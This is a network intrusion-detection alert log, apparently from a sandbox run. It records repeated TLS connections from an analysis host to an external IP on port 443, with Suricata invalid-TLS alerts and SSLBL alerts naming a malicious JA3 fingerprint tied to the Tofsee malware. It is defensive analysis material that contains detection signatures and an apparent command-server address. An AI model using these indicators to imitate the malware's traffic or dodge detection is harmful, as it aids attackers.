TCP 192.168.56.101:49387 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49387 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49456 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49456 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49387 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49387 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49273 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49240 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49273 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49240 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49273 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49333 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49333 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49458 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49333 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49458 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49240 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49395 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49458 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49273 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49395 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49273 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49395 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49458 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49458 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49395 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49395 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49277 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49339 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49277 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49339 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49277 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49339 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49462 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49462 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49462 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49404 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49404 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49339 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49404 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49339 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49462 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49462 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49281 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49281 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49404 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49281 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49404 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49345 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49345 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49345 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49405 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49285 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49405 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49345 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49285 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49405 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49345 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49285 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49405 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49285 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49405 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49285 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49346 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49346 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49346 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49406 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49346 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49286 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49406 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49346 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49286 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49406 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49286 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49286 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49286 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49240 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49240 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49280 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49280 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49289 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49406 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49280 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49289 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49406 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49347 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49289 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49243 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49243 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49243 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49409 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49289 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49347 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49409 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49289 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49347 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49409 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49284 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49347 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49284 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49409 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49284 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49290 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49409 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49347 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49290 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49290 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49243 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49290 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49243 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49415 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49290 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49415 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49415 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49299 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49299 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49352 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49257 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49299 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49352 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49257 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49352 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49257 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49299 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49352 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49299 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49257 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49352 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49257 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49305 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49354 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49305 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49354 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49282 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49305 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49354 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49282 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49282 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49284 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49354 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49415 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49284 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49354 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49415 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49305 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49305 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49359 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49359 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49425 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49359 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49291 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49425 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49308 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49291 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49308 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49291 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49308 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49425 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49308 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49308 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49291 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49291 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49427 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49427 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49427 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49313 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49313 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49313 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49298 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49282 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49282 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49298 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49298 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49298 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49283 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49298 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49427 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49427 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49283 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49314 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49283 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49314 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49301 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49314 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49301 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49301 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49432 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49432 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49432 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49314 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49314 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49301 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49301 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49283 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49283 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49316 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49316 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49316 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49303 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49287 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49303 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49303 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49432 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49432 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49303 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49303 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49433 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49433 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49433 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49359 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49359 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49433 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49304 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49433 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49320 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49304 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49320 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49304 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49320 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49365 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49365 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49435 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49320 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49365 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 34.192.83.212:443 -> 192.168.56.101:49320 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49435 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49304 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49287 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49304 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49287 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49321 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49287 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49321 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49287 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49321 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49318 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49318 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.101:49368 -> 34.192.83.212:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49318 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49368 -> 34.192.83.212:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 34.192.83.212:443 -> 192.168.56.101:49321 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.101:49368 -> 34.192.83.212:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
